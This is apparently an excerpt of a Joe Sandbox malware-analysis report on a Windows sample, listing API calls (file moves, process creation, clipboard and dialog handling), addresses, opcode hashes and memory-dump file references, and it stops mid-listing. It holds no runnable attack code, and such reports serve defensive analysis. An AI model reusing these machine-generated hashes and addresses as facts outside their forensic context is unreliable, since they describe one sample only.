                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                        • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                        APIs
                                        • MoveFileExW.KERNELBASE(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                          • Part of subcall function 0040619D: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                          • Part of subcall function 0040619D: GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                          • Part of subcall function 0040619D: GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                          • Part of subcall function 0040619D: wsprintfA.USER32 ref: 0040621C
                                          • Part of subcall function 0040619D: GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                          • Part of subcall function 0040619D: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                          • Part of subcall function 0040619D: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                          • Part of subcall function 0040619D: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
                                        • String ID:
                                        • API String ID: 1930046112-0
                                        • Opcode ID: bc3e1b88f0876d926df3a32e41be61310c0030b55e7fa6024756c8d654897218
                                        • Instruction ID: 6159d32a83a49ea468dc4acced1e1393ecd315f35058df340afbcf3d631cb787
                                        • Opcode Fuzzy Hash: bc3e1b88f0876d926df3a32e41be61310c0030b55e7fa6024756c8d654897218
                                        • Instruction Fuzzy Hash: 2AD0C731108741BEDB011F50ED0995B7BA1FFA4355F11C43EF599540B1D7319461DF05
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                        APIs
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                          • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                          • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                        • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                        • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                        • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405779
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                        • GetClientRect.USER32(?,?), ref: 004057C5
                                        • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                        • ShowWindow.USER32(?,00000008), ref: 00405868
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                        • CloseHandle.KERNEL32(00000000), ref: 004058F0
                                        • ShowWindow.USER32(00000000), ref: 00405914
                                        • ShowWindow.USER32(?,00000008), ref: 00405919
                                        • ShowWindow.USER32(00000008), ref: 00405963
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                        • CreatePopupMenu.USER32 ref: 004059A8
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                        • GetWindowRect.USER32(?,?), ref: 004059DC
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                        • OpenClipboard.USER32(00000000), ref: 00405A3D
                                        • EmptyClipboard.USER32 ref: 00405A43
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                        • CloseClipboard.USER32 ref: 00405A9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: {
                                        • API String ID: 590372296-366298937
                                        • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                        • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                        • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                        • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                        • lstrcmpiW.KERNEL32(Del,0042CA68,00000000,?,?), ref: 00404B2E
                                        • lstrcatW.KERNEL32(?,Del), ref: 00404B3A
                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                          • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                          • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                          • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                          • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                          • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                          • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                          • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                          • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$Del
                                        • API String ID: 2624150263-2818320640
                                        • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                        • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                        • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                        APIs
                                        • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 0040226E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CreateInstance
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp
                                        • API String ID: 542301482-2998130390
                                        • Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                        • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                        • Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                        • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                        • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                        • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                        • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                        • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                        • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                        • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                        • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                        • DeleteObject.GDI32(00000000), ref: 0040503D
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                        • ShowWindow.USER32(?,00000005), ref: 0040519F
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                        • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                        • GlobalFree.KERNEL32(?), ref: 0040537D
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                        • ShowWindow.USER32(?,00000000), ref: 00405527
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                        • ShowWindow.USER32(00000000), ref: 00405539
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                        • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                        • ShowWindow.USER32(?), ref: 00404033
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                        • ShowWindow.USER32(?,00000004), ref: 0040405E
                                        • DestroyWindow.USER32 ref: 00404072
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                        • GetDlgItem.USER32(?,?), ref: 004040AA
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                        • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                        • GetDlgItem.USER32(?,00000001), ref: 00404170
                                        • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                        • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                        • ShowWindow.USER32(00000000,?), ref: 004042AC
                                        • EnableWindow.USER32(?,?), ref: 004042BE
                                        • EnableWindow.USER32(?,?), ref: 004042D9
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                        • EnableMenuItem.USER32(00000000), ref: 004042F6
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                        • ShowWindow.USER32(?,0000000A), ref: 00404493
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
